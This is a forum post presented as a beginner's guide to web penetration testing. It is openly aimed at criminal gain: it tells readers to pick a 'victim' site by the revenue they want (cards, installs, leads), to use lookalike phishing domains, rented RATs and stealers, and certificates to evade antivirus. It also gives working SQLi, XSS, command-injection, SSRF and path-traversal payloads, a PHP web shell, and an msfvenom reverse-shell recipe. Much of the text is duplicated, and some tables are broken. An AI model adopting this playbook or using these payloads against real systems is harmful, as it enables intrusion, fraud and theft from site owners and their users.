ScanMap
New Member
- Joined
- April 22, 2026
- Messages
- 1
- Reaction score
- 0
- Points
- 1
- Thread Author
-
- #1
Hello, dear readers! In this article, I’ve put together a brief overview of the basics of web application penetration testing. This material will be particularly useful for those who are just planning to start working in this field. More advanced articles will be coming soon.
Where to start?
To get started, you’ll need a secure system running Kali Linux or another Linux distribution. It’s best to use a remote server-this will improve your operational security (OpSec). If you’re interested, I can go into more detail about how to choose a secure device and operating system.
Setting a target.
For those who don’t know where to start, I recommend deciding what kind of revenue you want to generate from website.
Website monetization is typically achieved through:
Reconnaissance
I will discuss an approach for working with a single specific target (other tools are required for mass-testing).
We navigate to the target website. First, we check which subdomains it has. Kali provides a tool called subfinder for this task (all these applications can be easily downloaded in other Linux distributions as well).
/blog/subfinder.png
We've identified several subdomains. Now we need to determine exactly what's on those subdomains; there's a browser plugin called Wappalyzer that can help with this. We get the following result:
/blog/wappalyzer.webp
We'll start fuzzing (brute-force testing) using ffuf to identify interesting endpoints; for this, we'll use a list of words for brute-force attacks from a great repository.
/blog/ffuf.webp
Be sure to try a Google dork - sometimes this simple method can uncover a lot of interesting information due to incorrect access settings for important files.
/blog/google-dork.webp
Gather basic information about DNS; sometimes this allows us to determine the server’s actual IP address without a WAF (protection against DDoS attacks, bots, vulnerabilities, etc.), similar to CloudFlare.
/blog/dns-lookup.webp
The most important thing in this section is to gather as much information as possible about the potential victim. The more information you gather - and the higher its quality - the easier it will be to carry out the subsequent steps.
Resource Development
This is the preparation phase, during which we select and prepare tools and develop a strategy. Everyone chooses the tools they find easiest to work with.
Purchase the necessary resources, such as:
Phishing – create a website that mimics the login page for the victim’s admin panel or project management dashboard, purchase a similar domain (replacing “i” with “l,” “o” with “0” , etc.) and distribute the link via email, phone calls, advertisements, postal mail, or social media.
Virus - use our own or rent software compatible with the victim’s operating system. The type of software should be chosen based on the task at hand (HVNC, RAT, stealer, loader). Purchase a certificate for the victim’s OS to bypass antivirus. Send an email with a clickfix (a CAPTCHA containing the payload).
Vulnerability - find errors related to incorrect file access settings, bugs in the code, such as SQLi (extracting data from a database), web cache spoofing, XXE injection (exploiting XML vulnerabilities), and many others. This is the main topic of my article today, and I will discuss it in more detail below.
Initial Access
The ultimate goal of every web hunter. The moment when you finally get what you’ve been searching for so long.
So let’s take a look at a few common vulnerabilities.
Burp Suite - the most convenient tool for modifying requests and responses
Let’s start with the well-known SQLi. To understand it, it helps to have some familiarity with the SQL language; in short, it’s enough to know that the SELECT statement causes many databases to reveal data to you, an ordinary user, that should have remained confidential. Such queries usually begin with a single quote (') and end with two backslashes (--)
Example of a vulnerable link
The most popular SQL databases are MySQL, PostgreSQL, Oracle, and Microsoft.
IDOR - Unauthorized access to sensitive data through brute-force attacks because the application does not verify whether the current user is authorized to view the page. Example:
You can try modifying the queries as follows:
XSS – when an interface is vulnerable to unexpected actions. If you discover one of these vulnerabilities, you can extract a session if the interface is configured incorrectly. Typically, these vulnerabilities are checked in all input fields or even when files are uploaded. Examples:
Command injection - when the backend executes commands on its operating system. Examples:
$(whoami)
Blind
; sleep 10
| ping -c 10 127.0.0.1
[/code]
SSRF – The #1 vulnerability according to OWASP 2025. It occurs when a web application navigates to a page it was not supposed to access. This exposes internal services, allows bypassing the firewall, and in some cases leads to privilege escalation to the level of remote code execution (RCE). The vulnerability is caused by a lack of restrictions on sending requests, incorrect CORS configuration, and weak input validation. Examples:
JWT Token Validation - These tokens are typically used to identify users. A JWT token is signed with the server’s private key, and if that key is compromised, it becomes possible to manipulate the information the backend uses to identify you.
Vulnerable file upload – sometimes the server-side component of a system executes a file you upload. Using Metasploit, you can easily create an exploit for this purpose.
LFI/RFI - The first vulnerability allows access to local files on the server, such as configuration data or other sensitive files. The second vulnerability involves the ability to upload and execute a file from a remote server. Examples:
Race Condition – If the backend cannot handle a large number of concurrent requests, it may process multiple purchases even if there were only enough funds in the account for one. Example:
One of these methods is bound to work for you; the key is to apply it correctly, without rushing and keeping your cool. You’ll succeed—you just need to get started. Thank you for reading to the end; I hope you found this article useful and not too boring.
To gain a foothold in the system and achieve results, there are many more steps to follow, but I’ve tried to explain the basics as clearly and simply as possible, without delving into overly technical details. If you’re interested, I can write more articles; there are plenty of topics to cover, and plenty of motivation.
Where to start?
To get started, you’ll need a secure system running Kali Linux or another Linux distribution. It’s best to use a remote server-this will improve your operational security (OpSec). If you’re interested, I can go into more detail about how to choose a secure device and operating system.
Setting a target.
For those who don’t know where to start, I recommend deciding what kind of revenue you want to generate from website.
Website monetization is typically achieved through:
- Cards
- Installs
- Leads from databases
- Traffic
Reconnaissance
I will discuss an approach for working with a single specific target (other tools are required for mass-testing).
We navigate to the target website. First, we check which subdomains it has. Kali provides a tool called subfinder for this task (all these applications can be easily downloaded in other Linux distributions as well).
Code:
subfinder -d target.com -o subdomains.txtWe've identified several subdomains. Now we need to determine exactly what's on those subdomains; there's a browser plugin called Wappalyzer that can help with this. We get the following result:
/blog/wappalyzer.webp
We'll start fuzzing (brute-force testing) using ffuf to identify interesting endpoints; for this, we'll use a list of words for brute-force attacks from a great repository.
Dictionary
Click on any file - a search bar will appear on the left; type “api-endpoints.txt” into it and save the file to the folder where the terminal is open. I also recommend briefly reviewing the other files in this repository.
Code:
github.com/danielmiessler/SecLists
Code:
ffuf -u https://www.target.com/FUZZ -w api-endpoints.txt -mc 200,301,302,401,403Be sure to try a Google dork - sometimes this simple method can uncover a lot of interesting information due to incorrect access settings for important files.
Code:
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:sql OR ext:envGather basic information about DNS; sometimes this allows us to determine the server’s actual IP address without a WAF (protection against DDoS attacks, bots, vulnerabilities, etc.), similar to CloudFlare.
Code:
d=example.com; for t in A AAAA CNAME MX NS TXT SOA CAA; do o=$(dig +short "$d" "$t"); [ -n "$o" ] && printf '\n[%s]\n%s\n' "$t" "$o"; doneYou should also pay attention to the following areas
- source code repositories;
- social media;
- gathering info about employees;
- searching for leaked strings related to this domain, for example from logs;
- gathering info about the target host: hardware, operating system, firmware;
- gathering info about the target network: DNS, IP addresses, network structure and topology.
Resource Development
This is the preparation phase, during which we select and prepare tools and develop a strategy. Everyone chooses the tools they find easiest to work with.
Purchase the necessary resources, such as:
- Domains (similar to the victims’ domains)
- Servers (abuse-resistant)
- Malware (viruses or backdoors)
- Exploits
- Accounts (on social media, email, cloud services)
- Advertising
Phishing – create a website that mimics the login page for the victim’s admin panel or project management dashboard, purchase a similar domain (replacing “i” with “l,” “o” with “0” , etc.) and distribute the link via email, phone calls, advertisements, postal mail, or social media.
Virus - use our own or rent software compatible with the victim’s operating system. The type of software should be chosen based on the task at hand (HVNC, RAT, stealer, loader). Purchase a certificate for the victim’s OS to bypass antivirus. Send an email with a clickfix (a CAPTCHA containing the payload).
Vulnerability - find errors related to incorrect file access settings, bugs in the code, such as SQLi (extracting data from a database), web cache spoofing, XXE injection (exploiting XML vulnerabilities), and many others. This is the main topic of my article today, and I will discuss it in more detail below.
Initial Access
The ultimate goal of every web hunter. The moment when you finally get what you’ve been searching for so long.
So let’s take a look at a few common vulnerabilities.
Burp Suite - the most convenient tool for modifying requests and responses
Setting up Burp Suite for Firefox
- Launch Burp Suite
- Install the FoxyProxy extension
- Add a proxy of type Burp
- Go to 127.0.0.1:8080 in your browser and download the certificate-you'll need it to intercept HTTPS traffic.
- Open Firefox settings, type Certificates in the search bar → click “View Certificates...” → Import. Select the cacert.der file, check all the boxes, and confirm.
- Now you can intercept and modify requests:
Example of a vulnerable link
Code:
https://target.com/products?category=Gifts'+OR+1=1--SQLi cheat sheet
Combining data from the output:
| | |
| ---------- | ------------------------------------- |
| Oracle |
|
| Microsoft |
|
| PostgreSQL |
|
| MySQL |
,
|
Cut the data from the output:
| | |
| ---------- | --------------------------- |
| Oracle |
|
| Microsoft |
|
| PostgreSQL |
|
| MySQL |
|
Comment
| | |
| ---------- | ------------------------------------- |
| Oracle |
|
| Microsoft |
|
| PostgreSQL |
|
| MySQL |
|
Data from the tables
| | |
| ---------- | ------------------------------------------------------------------------------------------------------------------------------- |
| Oracle |
|
| Microsoft |
|
| PostgreSQL |
|
| MySQL |
|
Combining data from the output:
| | |
| ---------- | ------------------------------------- |
| Oracle |
Code:
'foo'\|'bar'| Microsoft |
Code:
'foo'+'bar'| PostgreSQL |
Code:
'foo'\|'bar'| MySQL |
Code:
'foo' 'bar'
Code:
CONCAT('foo','bar')Cut the data from the output:
| | |
| ---------- | --------------------------- |
| Oracle |
Code:
SUBSTR('foobar', 4, 2)| Microsoft |
Code:
SUBSTRING('foobar', 4, 2)| PostgreSQL |
Code:
SUBSTRING('foobar', 4, 2)| MySQL |
Code:
SUBSTRING('foobar', 4, 2)Comment
| | |
| ---------- | ------------------------------------- |
| Oracle |
Code:
--comment<br>| Microsoft |
Code:
--comment<br> /[i]comment[/i]/| PostgreSQL |
Code:
--comment<br> /[i]comment[/i]/| MySQL |
Code:
#comment
Code:
-- comment
Code:
/[i]comment[/i]/Data from the tables
| | |
| ---------- | ------------------------------------------------------------------------------------------------------------------------------- |
| Oracle |
Code:
SELECT [i] FROM all_tables<br> SELECT [/i] FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'| Microsoft |
Code:
SELECT [i] FROM information_schema.tables<br> SELECT [/i] FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'<br>| PostgreSQL |
Code:
SELECT [i] FROM information_schema.tables<br> SELECT [/i] FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'<br>| MySQL |
Code:
SELECT [i] FROM information_schema.tables<br> SELECT [/i] FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
Code:
GET /api/user/123/profile
GET /api/user/124/profile
curl -x POST /api/user/124/profile
curl -x PUT /api/user/124/profile
curl -x DELETE /api/user/124/profile
Code:
POST /api/user/124/update
{"role": "admin", "is_admin": true}
Code:
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<ScRiPt>alert(1)</sCrIpT>
<body onload=alert(1)>
<svg/onload=alert(1)>
Code:
; ls
| cat /etc/passwd
&& whoami
[code]idBlind
; sleep 10
| ping -c 10 127.0.0.1
[/code]
SSRF – The #1 vulnerability according to OWASP 2025. It occurs when a web application navigates to a page it was not supposed to access. This exposes internal services, allows bypassing the firewall, and in some cases leads to privilege escalation to the level of remote code execution (RCE). The vulnerability is caused by a lack of restrictions on sending requests, incorrect CORS configuration, and weak input validation. Examples:
Code:
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
[size=6]Bypass[/size]
http://127.1
http://[::1]
http://127.0.0.1.nip.io
Code:
jwt_tool <TOKEN> -X k -pk public.pemCreating a reverse shell in Metasploit
/blog/mfconsole.png
/blog/exploit.webp
Once the payload has executed, a reverse connection will be established on the target system, and you will be able to interact with the remote system via nc.
- Open the console
Code:
msfconsole- Generate the payload
Code:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<your_ip> LPORT=9001 -f raw -o shell.php- Start the listener for incoming connections:
Code:
nc -lvnp 9001
Code:
# PHP shell
<?php system($_GET['cmd']); ?>
[size=6]Bypass using an extension[/size]
GIF89a<?php system($_GET['cmd']); ?>
shell.php.jpg
shell.php%00.jpg
shell.PhP
Code:
../../../../etc/passwd
../../../../var/log/apache2/access.log
Code:
import concurrent.futures, requests
def req():
return requests.post('https://target.com/redeem',
data={'code': 'GIFT100'})
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as ex:
[ex.submit(req) for _ in range(20)]Cheat sheet:
| Parameter | Vulnerability Type |
| ---------- | ---------------------- |
| ?id= | SQL Injection, IDOR |
| ?url= | SSRF |
| ?file= | LFI/RFI |
| ?page= | LFI |
| ?redirect= | Open Redirect |
| ?callback= | JSONP Hijacking |
| ?email= | Email Header Injection |
| ?search= | XSS, SQL Injection |
| ?image= | SSRF |
| ?template= | SSTI |
| Parameter | Vulnerability Type |
| ---------- | ---------------------- |
| ?id= | SQL Injection, IDOR |
| ?url= | SSRF |
| ?file= | LFI/RFI |
| ?page= | LFI |
| ?redirect= | Open Redirect |
| ?callback= | JSONP Hijacking |
| ?email= | Email Header Injection |
| ?search= | XSS, SQL Injection |
| ?image= | SSRF |
| ?template= | SSTI |
You may also find the following useful
- Buffer overflow
- Wi-Fi network hacking
- Infection via USB drive
- Supply chain attacks
- Valid credentials
- Exploits
- Content injection
One of these methods is bound to work for you; the key is to apply it correctly, without rushing and keeping your cool. You’ll succeed—you just need to get started. Thank you for reading to the end; I hope you found this article useful and not too boring.
To gain a foothold in the system and achieve results, there are many more steps to follow, but I’ve tried to explain the basics as clearly and simply as possible, without delving into overly technical details. If you’re interested, I can write more articles; there are plenty of topics to cover, and plenty of motivation.
Support the author
If you’d like to support my efforts, I’m running a project designed to help you with the reconnaissance phase - ScanMap.top
I would be infinitely grateful if you could support this content with a small donation:
BTC - bc1qdaq8f2mymek9fulh4x2qtyw0weatq3nvgu2xc0
LTC - ltc1qcrt350wr2pl525hxql57ez9lzd4vpwgx8m6g50
ETH - 0x52FfB2eB2118F46843227DB661F6cB2843beb853
XMR - 88En3TvEMgjSdQAtkWYUv1QWwexgBkW4F2smRTsWBbVzhwvxXf1yFEL2mhWd923rQvQ9LkSimPDDDJh5f97zWAT2SYbtJcM
If you’d like to support my efforts, I’m running a project designed to help you with the reconnaissance phase - ScanMap.top
I would be infinitely grateful if you could support this content with a small donation:
BTC - bc1qdaq8f2mymek9fulh4x2qtyw0weatq3nvgu2xc0
LTC - ltc1qcrt350wr2pl525hxql57ez9lzd4vpwgx8m6g50
ETH - 0x52FfB2eB2118F46843227DB661F6cB2843beb853
XMR - 88En3TvEMgjSdQAtkWYUv1QWwexgBkW4F2smRTsWBbVzhwvxXf1yFEL2mhWd923rQvQ9LkSimPDDDJh5f97zWAT2SYbtJcM